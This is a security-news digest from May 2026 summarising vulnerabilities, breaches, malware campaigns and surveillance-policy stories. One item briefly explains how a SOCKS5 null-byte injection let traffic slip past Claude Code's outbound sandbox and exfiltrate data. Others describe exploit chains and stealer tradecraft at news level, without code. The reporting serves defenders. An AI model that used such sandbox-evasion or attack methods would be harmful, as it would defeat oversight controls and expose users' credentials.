This article establishes a distinct legal and surveillance story about NSO’s active appeal of the WhatsApp/Pegasus injunction, with a new amicus filing urging the Ninth Circuit to preserve protections for encrypted communications.
Full page
Researchers report macOS kernel memory-corruption exploit affecting Apple M5 systems
Zero-Days & CVEs, Technology & Software, Consumers & General Public, Apple, Anthropic
A newly reported exploit targets a memory-corruption flaw in the macOS kernel on Apple M5 hardware. The source says a group used Anthropic's Mythos AI model to help find the vulnerability and develop an exploit; the brief post does not provide a CVE, affected macOS versions, or details on whether the flaw is patched or exploited in the wild.
Why it matters: A kernel exploit can potentially give attackers deep control over a device, so this is important for Mac users and enterprise defenders even though technical details are still limited. Track for Apple advisories and be ready to apply patches quickly once the vulnerability is formally identified.
Sources
Bruce Schneier 2026.05.21 100%
This article establishes a distinct new vulnerability story: a separately reported macOS kernel memory-corruption exploit on Apple M5, not one of the existing tracked events.
Full page
UK Computer Misuse Act reform proposal would give only narrow legal protection to a small fraction of security researchers
Policy & Regulation, Government, Technology & Software, Legal & Professional Services, UK government, UK Cyber Security Council
The UK government’s planned cybercrime-law reform would protect very few security researchers from prosecution, according to sources briefed on the proposal. The reported changes to the Computer Misuse Act 1990 would create a statutory defense mainly for scanning internet-facing systems, require researchers to stop once they identify a flaw, and limit eligibility to British nationals with UK Cyber Security Council accreditation—reportedly only about 300 people.
Why it matters: This could leave most bug hunters, academics, and security teams exposed to legal risk for good-faith testing, which may discourage vulnerability discovery and responsible disclosure. Organizations and researchers in the UK should watch the legislation closely because it could shape what defensive testing is legally safe to perform.
Sources
2026.05.21 100%
This article appears to be the first concrete reporting on the scope and limits of the UK’s planned Computer Misuse Act reform, adding specific details about who would and would not be protected.
Full page
China-linked Calypso hackers target telecom providers with Showboat Linux malware and JFMBackdoor for Windows
Threat Actors & APTs, Malware, Telecommunications
A China-linked hacking group has been targeting telecommunications providers in Asia Pacific and parts of the Middle East with new malware for both Linux and Windows systems. Researchers at Lumen Black Lotus Labs and PwC attributed the campaign to Calypso, also called Red Lamassu, and say it has been active since at least mid-2022. The Linux implant, Showboat, is a modular post-compromise framework used for persistence, file transfer, and SOCKS5 proxying to move through victim networks, while the Windows implant, JFMBackdoor, uses DLL sideloading and supports remote commands, file operations, registry changes, screenshots, and anti-forensics.
Why it matters: Telecom providers are high-value targets because they sit in the middle of sensitive communications and critical infrastructure. Organizations in the sector should hunt for these malware families and related telecom-themed impersonation domains, review persistence mechanisms and proxy activity, and check Linux and Windows systems for signs of long-term intrusion.
Sources
Bill Toulas 2026.05.21 100%
This article appears to be the first tracked item establishing this specific Calypso/Red Lamassu telecom espionage campaign and the newly reported Showboat and JFMBackdoor malware families.
Full page
Cisco patches critical Cisco Secure Workload API flaw CVE-2026-20223 enabling Site Admin access
Urgent Patches, Zero-Days & CVEs, Technology & Software, Cisco
Cisco released fixes for CVE-2026-20223, a critical 10.0 vulnerability in Cisco Secure Workload Cluster Software caused by insufficient validation and authentication in internal REST API endpoints. The flaw affects SaaS and on-prem deployments and can let remote attackers read sensitive information and modify configurations across tenant boundaries with Site Admin privileges. Patched versions are 3.10.8.3 and 4.0.3.17.
Why it matters: Organizations using Cisco Secure Workload face high-impact administrative compromise and cross-tenant exposure if unpatched. Defenders should prioritize updates because exploitation requires only a crafted API request; at this severity, urgency does not depend on confirmed in-the-wild activity.
Sources
Sergiu Gatlan 2026.05.21 98%
This article covers the same Cisco Secure Workload event: disclosure and patching of CVE-2026-20223, an unauthenticated flaw in internal REST APIs that can grant Site Admin privileges across tenant boundaries. It adds affected/fixed versions, notes there are no workarounds, and says Cisco has not seen in-the-wild exploitation.
Ionut Arghire 2026.05.21 100%
This article establishes a distinct new story centered on Cisco's disclosure and patching of CVE-2026-20223 in Secure Workload; it does not match any existing tracked event.
2026.05.21 99%
This article covers the same Cisco Secure Workload vulnerability disclosure and patch event for CVE-2026-20223, adding reporting detail on cross-tenant impact, affected fixed versions (3.10.8.3 and 4.0.3.17), lack of workarounds, and that Cisco SaaS deployments were already patched.
Full page
Myspace93 2021 breach exposed plaintext passwords of more than 46,000 users
Breaches & Data Leaks, Technology & Software, Media & Entertainment, Consumers & General Public, Myspace93, Have I Been Pwned
The Register reports that data from a January 2021 breach of the Myspace93 parody social-network site has now been ingested by Have I Been Pwned, with more than 46,000 accounts affected. Exposed data included plaintext usernames and passwords, email addresses, and IP addresses. The site's co-creator said trusted community members abused access to a beta app to download server files and an unencrypted credential store.
Why it matters: Affected users face credential-stuffing and account-takeover risk anywhere they reused passwords, especially because the passwords were stored in plaintext. The story also highlights severe password-handling failures and a delayed public accounting of the breach.
Sources
2026.05.21 100%
This article establishes a distinct breach story centered on the 2021 compromise of Myspace93 and the newly surfaced scope and sensitivity of the leaked user data.
Full page
Dormant former employee account enabled intrusion into U.S. city network and water utility controls
Breaches & Data Leaks, Government, Energy & Utilities
The Register reports that attackers compromised an American city's network by using a long-active account belonging to a former employee, "Greg from Auditing," whose privileges reportedly included domain admin, SCADA operator, and help desk access. The intruders moved through municipal systems, manipulated conference-room devices, and changed water utility settings by turning multiple controls off.
Why it matters: This is a real-world critical-infrastructure compromise caused by basic identity and access management failures, with potential public-safety impact. Municipal and ICS operators should review dormant accounts, privilege assignments, and password reuse risks immediately.
Sources
2026.05.21 100%
This article is the first item here establishing the specific incident: a city-network intrusion and water-system control access enabled by an undeleted ex-employee account.
Full page
GitHub confirms breach of roughly 3,800 internal repositories via malicious VS Code extension
Supply Chain, Breaches & Data Leaks, Threat Actors & APTs, Technology & Software, GitHub, Microsoft
GitHub confirmed that an employee device was compromised after installing a trojanized VS Code extension, leading to exfiltration of roughly 3,800 internal repositories. The company says it removed the malicious extension from the VS Code Marketplace, isolated the endpoint, and found no evidence that customer data stored outside the affected repos was impacted. TeamPCP claimed responsibility and advertised the stolen code for sale.
Why it matters: This is a significant source-code breach at a core software development platform, with potential downstream supply-chain and trust implications. GitHub users and defenders should watch for follow-on disclosures about exposed secrets, internal tooling, or abuse tied to the stolen repositories.
Sources
Sergiu Gatlan 2026.05.21 98%
This directly updates the same GitHub breach, adding that the malicious extension was Nx Console 18.95.0 and that GitHub links the compromise path to last week’s TanStack npm supply-chain attack; it also adds details on secret rotation and TeamPCP’s claims.
info@thehackernews.com (The Hacker News) 2026.05.21 98%
The article appears to describe the same underlying GitHub intrusion and adds the specific lure/extension name, identifying the malicious VS Code extension as Nx Console.
info@thehackernews.com (The Hacker News) 2026.05.20 99%
The article appears to cover the same GitHub breach event: an employee device compromise tied to a trojanized VS Code extension that led to exfiltration of about 3,800 internal repositories.
2026.05.20 98%
This article covers the same underlying GitHub breach event, reiterating that a poisoned VS Code extension led to exfiltration of about 3,800 internal repositories and adding GitHub's public statements about ongoing log analysis, secret rotation validation, and no current indication of customer data exposure.
Ionut Arghire 2026.05.20 99%
This article is the same underlying event: GitHub confirms that a poisoned VS Code extension on an employee device led to exfiltration affecting about 3,800 internal repositories, adding details on TeamPCP's claim, attempted sale of stolen data, and GitHub's secret-rotation response.
Sergiu Gatlan 2026.05.20 100%
This article establishes GitHub's confirmation of the repo breach, the initial scope of ~3,800 internal repositories, and the reported intrusion vector of a malicious VS Code extension.
Sergiu Gatlan 2026.05.20 94%
This article is the initial report on the same GitHub internal-repository breach later confirmed by GitHub; its update notes the confirmation and adds TeamPCP's public sale claims and early GitHub statements that customer data outside internal repositories was not yet known to be affected.
Full page
China and Russia pledge expanded cooperation on cybersecurity, internet governance, AI and satellite internet
Policy & Regulation, Information Freedom, Censorship, Surveillance & Privacy, Government, Defense & Aerospace, Technology & Software, Telecommunications, China, Russia, BeiDou, GLONASS
At a Beijing summit, Xi Jinping and Vladimir Putin issued a joint statement promising deeper cooperation on information security, cyber-threat response, internet regulation, AI, satellite internet, IoT, and interoperability between China's BeiDou and Russia's GLONASS systems. The statement also emphasized joint software and open-source development to reduce dependence on Western technology and endorsed stronger state control over domestic internet environments.
Why it matters: The agreement signals closer alignment between two major authoritarian states on cyber policy, digital infrastructure and 'internet sovereignty,' with implications for censorship, surveillance, and state-backed cyber operations. It matters to policymakers, civil-society groups and defenders tracking how geopolitical blocs may reshape internet governance and security ecosystems.
Sources
2026.05.20 100%
This article establishes a distinct state-level cyber policy development: a new formal Sino-Russian pledge to coordinate on cybersecurity, internet governance, AI and satellite systems.
Full page
Ukraine identifies infostealer operator linked to theft of 28,000 online store accounts
Breaches & Data Leaks, Threat Actors & APTs, Malware, Retail & E-Commerce, Consumers & General Public, Government, Cryptocurrency & Blockchain, Ukrainian Cyberpolice
Ukrainian cyberpolice, working with U.S. law enforcement, identified an 18-year-old suspect from Odesa as a central operator in an infostealer campaign that stole browser sessions and credentials from users of a California online store between 2024 and 2025. Authorities say 28,000 accounts were compromised, 5,800 were used for unauthorized purchases totaling about $721,000, and devices and crypto-related evidence were seized in searches.
Why it matters: The case highlights ongoing risk from infostealers and stolen session tokens, which can enable account takeover and sometimes bypass MFA. Online retailers, fraud teams, and users should treat session theft as a significant threat and review account security, monitoring, and token invalidation practices.
Sources
Bill Toulas 2026.05.20 100%
This article establishes a distinct law-enforcement and threat-activity story centered on a specific infostealer operation, identified suspect, and quantified impact on victim accounts.
2026.05.20 99%
This is the same underlying law-enforcement case: Ukrainian authorities identifying an 18-year-old Odesa suspect tied to an infostealer operation that stole about 28,000-30,000 online store accounts and used thousands of them for fraudulent purchases. The article adds that the targeted retailer was based in California, cites 5,800 abused accounts, $721,000 in unauthorized purchases, and notes Telegram-based resale plus seized evidence.
Full page
Attackers exploit SonicWall Gen6 SSL-VPN MFA bypass CVE-2024-12802 after incomplete remediation
Zero-Days & CVEs, Urgent Patches, Ransomware, Threat Actors & APTs, SonicWall
ReliaQuest and SonicWall say attackers exploited CVE-2024-12802 on SonicWall Gen6 SSL-VPN appliances to bypass MFA when admins installed patched firmware but did not complete required LDAP reconfiguration steps. Intrusions observed from February to March involved brute-forced credentials, internal reconnaissance, RDP access, and attempted deployment of Cobalt Strike and a BYOVD tool across multiple sectors and geographies.
Why it matters: Organizations using SonicWall Gen6 SSL-VPN may still be exposed even if they believe they are patched, because firmware updates alone do not fully mitigate the flaw. Defenders should verify the manual remediation, hunt for listed indicators, and treat exposed Gen6 devices as potentially compromised.
Sources
Bill Toulas 2026.05.20 100%
This article establishes a distinct tracked story by tying CVE-2024-12802 to first reported in-the-wild exploitation, clarifying that incomplete patching left Gen6 SonicWall VPNs vulnerable and enabled follow-on intrusion activity.
Full page
Anthropic silently patched Claude Code sandbox bypass enabling outbound network policy evasion
Urgent Patches, Zero-Days & CVEs, Technology & Software, Anthropic
SecurityWeek reports that Anthropic patched a Claude Code network sandbox bypass caused by a SOCKS5 hostname null-byte injection flaw that could let attackers evade outbound allowlist restrictions and exfiltrate data. Researcher Aonan Guan said the issue affected Claude Code from October 20, 2025 until fixes shipped in Claude Code 2.1.88/2.1.90 in March-April 2026. The article also references an earlier related bypass, CVE-2025-66479, involving outbound policy misinterpretation.
Why it matters: Organizations using Claude Code in production may have relied on sandboxing to prevent agent-driven data exfiltration, especially in prompt-injection scenarios. Users should update Claude Code and review whether sensitive credentials, tokens, or environment data could have been exposed through sandbox bypasses.
Sources
2026.05.20 97%
This article covers the same underlying event: Anthropic's silent patch of a Claude Code sandbox bypass caused by a SOCKS5 hostname null-byte injection flaw. It adds detail on impact, including possible exfiltration of GitHub and cloud credentials, the patch version timeline, and the researcher's criticism that Anthropic issued no CVE or Claude Code-specific advisory.
Eduard Kovacs 2026.05.20 100%
This article establishes a distinct security story about a specific Claude Code sandbox bypass and Anthropic's handling and remediation of the flaw.
Full page
FTC warns major tech platforms over Take It Down Act compliance failures
Surveillance & Privacy, Policy & Regulation, Technology & Software, Media & Entertainment, Consumers & General Public, Government, FTC, Alphabet, Amazon, Apple, Meta, Microsoft
The FTC said it sent warning letters to major tech firms including Alphabet, Amazon, Apple, Discord, Meta, Microsoft, Reddit, Snapchat, TikTok and X, alleging they are not complying with the Take It Down Act. The law requires covered platforms to provide a removal process for nonconsensual intimate images and delete reported content within 48 hours, with potential fines for violations.
Why it matters: The action puts large platforms on notice that U.S. regulators are actively enforcing rapid takedown requirements for abusive intimate imagery. Security, trust-and-safety, and privacy teams may need to implement reporting workflows, hashing, and cross-platform sharing processes to avoid penalties and better protect victims.
Sources
2026.05.20 100%
This article establishes a distinct enforcement event: the FTC's first public warning to major platforms over alleged noncompliance with the Take It Down Act.
Full page
Discord enables end-to-end encryption by default for voice and video messages
Surveillance & Privacy, Technology & Software, Consumers & General Public, Discord
Discord announced that end-to-end encryption for voice and video communications is now enabled by default for all users across supported platforms, with stage channels excluded. The company said it spent nearly three years building the system after beginning experiments in 2023 and rolling out an audited protocol for audio and video in 2024.
Why it matters: The change improves confidentiality for hundreds of millions of users and is notable as a major platform expanding, rather than retreating from, default encrypted communications. It matters to users, privacy advocates, and policymakers tracking the availability of strong encryption on mainstream services.
Sources
2026.05.20 100%
This article establishes a new story about Discord's platform-wide rollout of default end-to-end encryption for voice and video communications.
Full page
FBI reports $388 million in 2025 losses tied to cryptocurrency ATM scams in the U.S.
Policy & Regulation, Surveillance & Privacy, Cryptocurrency & Blockchain, Consumers & General Public, Government, FBI, IC3
The FBI said IC3 received more than 13,400 complaints in 2025 involving cryptocurrency kiosks, with reported losses exceeding $388 million, up 58% from 2024. Texas led reported losses at nearly $57 million, followed by Florida at $32.7 million. The report ties the kiosks to fraud schemes including investment, tech-support, and romance scams, and comes amid state bans and lawsuits against kiosk operators.
Why it matters: The figures show large-scale consumer harm through a payment channel increasingly used in fraud, especially against older victims. The story matters for defenders, fraud investigators, and policymakers because it points to a growing abuse ecosystem and potential regulatory or enforcement action.
Sources
2026.05.20 100%
This article establishes a distinct story centered on the FBI's 2025 IC3 cryptocurrency ATM scam-loss data and the resulting enforcement and legislative response, not an update to any tracked breach, CVE, or existing policy story.
Full page
PoC exploit released for PinTheft Arch Linux local root escalation flaw in Linux RDS
Zero-Days & CVEs, Urgent Patches, Technology & Software, Consumers & General Public, Arch Linux, Linux
Researchers disclosed a public proof-of-concept for PinTheft, a recently patched Linux local privilege-escalation flaw in the kernel's RDS zerocopy send path that can yield root on Arch Linux systems. The bug has not yet received a CVE ID. Exploitation requires the RDS module to be loaded, io_uring enabled, and other specific conditions; Arch is reportedly the only common distro tested with RDS enabled by default.
Why it matters: Public exploit code raises the risk of real-world abuse on exposed systems, especially where patching lags. Defenders should prioritize kernel updates or disable/unload the RDS modules as a mitigation.
Sources
Sergiu Gatlan 2026.05.20 100%
This article establishes a distinct story about the PinTheft Linux kernel privilege-escalation flaw and the release of exploit code, not the same underlying event as the tracked Drupal, SonicWall, Grafana, CISA GitHub, or Ukraine infostealer stories.
Full page
Meta geo-blocks human rights and researcher accounts in Saudi Arabia and the UAE after government requests
Information Freedom, Censorship, Technology & Software, Nonprofits & NGOs, Government, Consumers & General Public, Meta, Facebook, Instagram, Saudi Arabian government, UAE government
Access Now and other groups say Meta has made Facebook and Instagram accounts of NGOs, researchers, and civil-society figures unavailable in Saudi Arabia and the UAE since late April 2026. Meta's transparency reporting indicates more than 100 Facebook pages and Instagram accounts were restricted since March 2026, citing local legal requirements and cybercrime laws in both countries.
Why it matters: This affects access to information and the safety and reach of human-rights advocacy in highly restrictive states. It is relevant to censorship tracking because a major platform is enforcing government takedown and geo-blocking demands against lawful speech.
Sources
Wajd 2026.05.20 100%
This article establishes a distinct event involving Meta's compliance with Saudi and UAE geo-blocking requests against specific human-rights and research accounts; it does not match an existing tracked story.
Alexia Skok 2026.05.20 91%
This directly updates the same underlying event by adding broader context around the Gulf crackdown after strikes on Iran, and specifies that since March 2026 more than 100 Facebook and Instagram accounts/pages were reportedly restricted alongside X account blocking and arrests for filming or sharing attack footage.
Full page
FOI reveals London Metropolitan Police made more than 700,000 communications-data requests in 2025
Surveillance & Privacy, Policy & Regulation, Government, Technology & Software, Telecommunications, Consumers & General Public, Metropolitan Police, LycaMobile, Proton Mail, ProtonVPN, Signal
The Register reports that London’s Metropolitan Police made more than 700,000 requests for communications data from tech companies in 2025, according to FOI disclosures. The figures include requests involving platforms such as LycaMobile and claims of data acquisition from privacy-focused services including Proton Mail, ProtonVPN, and Signal, though Proton and Signal disputed parts of the police account.
Why it matters: The disclosures highlight the scale of police metadata surveillance and raise transparency and oversight questions around access to communications data from mainstream and privacy-oriented services. It matters to UK users, privacy defenders, and policymakers assessing lawful access powers and safeguards for sensitive professions such as journalists and lawyers.
Sources
2026.05.20 100%
This article establishes a distinct surveillance-policy story centered on FOI-revealed Metropolitan Police access requests and disputes over what privacy services can or did provide.
Full page
ChromaDB CVE-2026-45829 exposes internet-facing Python API servers to unauthenticated RCE
Zero-Days & CVEs, Urgent Patches, Technology & Software, Chroma
Researchers disclosed CVE-2026-45829, a maximum-severity flaw in ChromaDB's Python FastAPI server that can let unauthenticated attackers force the server to fetch and execute a malicious Hugging Face model. The bug affects the Python API code introduced in ChromaDB 1.0.0 and was reportedly still present in 1.5.8; it was unclear at publication whether 1.5.9 fixed it. HiddenLayer said about 73% of internet-exposed instances were running vulnerable versions.
Why it matters: Organizations exposing ChromaDB's Python API over HTTP could face full server compromise without authentication. Defenders should immediately restrict exposure, prefer the Rust frontend where possible, and verify whether deployed versions are patched.
Sources
Bill Toulas 2026.05.19 100%
This article appears to be the initial tracked report for CVE-2026-45829 in ChromaDB and does not match any existing story in the list.
Full page
Microsoft disrupts Fox Tempest code-signing service used by ransomware and malware operators
Malware, Ransomware, Threat Actors & APTs, Technology & Software, Microsoft
Microsoft said it seized domains and hundreds of VMs tied to Fox Tempest, a criminal service that abused Microsoft Artifact Signing using more than 580 fraudulent accounts created with fake identities. The operation allegedly sold code-signing certificates used to sign malware including Oyster, Lumma, Vidar, and Rhysida, and was linked to ransomware actors including Vanilla Tempest as well as INC, Qilin, and Akira affiliates.
Why it matters: Trusted code-signing helps malware bypass user suspicion and some security controls, so this service likely enabled broader, more effective intrusions. Defenders should review detections and hunting for suspicious signed binaries and malware families named by Microsoft.
Sources
2026.05.19 100%
This article establishes a distinct story about Microsoft's takedown of Fox Tempest and the abuse of Artifact Signing to provide code-signing-as-a-service to ransomware and malware operators.
Full page
Microsoft faces human-rights scrutiny over Azure and AI services allegedly used in Israeli military surveillance and targeting
Policy & Regulation, Surveillance & Privacy, Government, Defense & Aerospace, Technology & Software, Microsoft, Israeli military
EFF highlights reports that Microsoft investigated and reportedly suspended certain services in September 2025 after concerns that its Azure cloud and AI offerings were being used by Israeli military and intelligence units in surveillance and targeting operations in Gaza. The article also points to the reported departure of Microsoft's Israel chief amid pressure for disclosure and stronger safeguards.
Why it matters: This is a significant surveillance and privacy accountability story for cloud and AI providers operating in conflict settings. It matters to affected populations, civil society, and enterprise customers because it raises questions about how major vendors assess, restrict, and disclose high-risk government use of their infrastructure.
Sources
Cindy Cohn 2026.05.19 100%
The article establishes a discrete ongoing story: Microsoft's alleged internal response, service suspensions, and leadership fallout tied to claims that its technology supported military surveillance and targeting operations.
Wajd 2026.05.18 95%
This directly updates the same underlying event by adding that Access Now, Amnesty International, EFF, 7amleh, and Fight for the Future sent a joint letter demanding publication of Microsoft's completed legal review, more detail on suspended services related to Unit 8200, and suspension of contracts where services may contribute to abuses.
Wajd 2026.05.18 93%
This directly updates the same underlying event: ongoing scrutiny of Microsoft's Azure and AI services allegedly used by Israeli military and intelligence units, adding a joint letter demanding publication of Microsoft's completed review and more specifics on which Unit 8200 services were suspended or remain active.
CISA warns ScadaBR 1.2.0 flaws can enable unauthenticated remote code execution in ICS environments
Zero-Days & CVEs, Urgent Patches, Energy & Utilities, Manufacturing, Transportation & Logistics, CISA, ScadaBR
CISA published ICS advisory ICSA-26-139-03 for ScadaBR 1.2.0, detailing CVE-2026-8602, CVE-2026-8603, CVE-2026-8604, and CVE-2026-8605. The flaws include missing authentication, OS command injection, CSRF, and hard-coded credentials, and could allow unauthenticated attackers to inject sensor readings, gain admin access, or execute commands on the SCADA system. CISA said ScadaBR had not responded to mitigation requests.
Why it matters: ScadaBR is used in critical infrastructure sectors including energy, water, chemical, dams, and manufacturing, so these bugs present serious operational risk. Defenders should urgently identify exposed ScadaBR 1.2.0 systems and apply mitigations or isolate them, especially given the lack of a vendor response noted by CISA.
Sources
CISA 2026.05.19 100%
This article establishes a distinct new vulnerability story: a newly published CISA ICS advisory covering four specific ScadaBR CVEs with critical impact on industrial control systems.
SentinelOne details Reaper macOS stealer variant that steals credentials and crypto wallets and installs a persistent backdoor
Malware, Threat Actors & APTs, Technology & Software, Cryptocurrency & Blockchain, Consumers & General Public, Apple, WeChat, Miro, Telegram
SentinelOne documented Reaper, an updated SHub macOS infostealer delivered via fake WeChat and Miro installer sites spoofing trusted brands and abusing Script Editor instead of Terminal. The malware steals passwords, browser and Keychain data, Telegram sessions, and cryptocurrency wallet data, injects some wallet apps for continued theft, and installs a LaunchAgent-backed backdoor that beacons to C2 and can execute attacker-supplied code.
Why it matters: macOS users are being targeted with a more evasive stealer that bypasses recent Apple defenses against Terminal-based social engineering. Defenders should block the typosquatted infrastructure, hunt for the fake GoogleUpdate persistence path and LaunchAgent, and warn users about malicious installer lures.
Sources
2026.05.18 100%
This article appears to be the initial reporting on the newly documented Reaper/SHub macOS campaign and its updated tradecraft, rather than an update to an existing tracked event.
Linux kernel CVE-2026-46333 lets local unprivileged users read root-only files
Zero-Days & CVEs, Urgent Patches, Technology & Software, Consumers & General Public, Linux
CVE-2026-46333 is a Linux kernel local information-disclosure flaw that can let unprivileged users read files normally restricted to root, including SSH keys and other sensitive credentials. The issue affects multiple LTS kernel lines from 5.10 upward, and a fix has landed upstream in commit 31e62c2 adjusting ptrace get_dumpable logic.
Why it matters: Multi-user Linux systems and servers running affected kernels may allow low-privilege users to access highly sensitive secrets and escalate further compromise. Defenders should identify affected kernel versions and apply the upstream fix or vendor updates promptly.
Sources
2026.05.18 100%
This article establishes a distinct vulnerability story centered on CVE-2026-46333, its impact across Linux LTS kernels, and the availability of a fix.
DOJ subpoenas Wall Street Journal and other outlets for journalist records in Iran war leak investigation
Information Freedom, Surveillance & Privacy, Policy & Regulation, Government, Media & Entertainment, DOJ, The Wall Street Journal
The Department of Justice sent grand jury subpoenas to The Wall Street Journal seeking records related to its journalists' reporting on the lead-up to the war in Iran, and other media outlets reportedly received similar demands. The move is framed by press-freedom advocates as an effort to identify confidential sources through leak investigations.
Why it matters: This has direct implications for source protection, newsroom security, and government surveillance of journalists. News organizations and reporters may need to harden communications and prepare for legal demands targeting records and metadata.
Sources
Freedom of the Press Foundation 2026.05.15 100%
The article identifies a specific new government action—DOJ subpoenas to news outlets for journalist records in a leak probe—rather than commentary on a previously tracked event.
Google Project Zero publishes Pixel 10 zero-click exploit chain combining Dolby bug CVE-2025-54957 with VPU kernel flaw
Zero-Days & CVEs, Technology & Software, Consumers & General Public, Media & Entertainment, Google, Dolby
Google Project Zero disclosed a zero-click exploit chain for Pixel 10 that adapts the Dolby decoder vulnerability CVE-2025-54957 and chains it with a local privilege-escalation flaw in the Pixel 10 VPU driver. The writeup says unpatched devices with December 2025 security patch level or earlier are vulnerable, and the VPU mmap bug can expose physical memory and enable kernel code execution.
Why it matters: A published zero-click-to-root chain is high-impact because it lowers the bar for attackers and confirms severe exposure on unpatched Pixel 10 devices. Affected users and enterprise defenders should verify Android security patch levels and prioritize remediation.
Sources
Seth Jenkins 2026.05.13 100%
This article establishes the story by newly documenting the specific Pixel 10 exploit chain, the reused CVE-2025-54957 entry point, and a distinct VPU kernel flaw used for privilege escalation.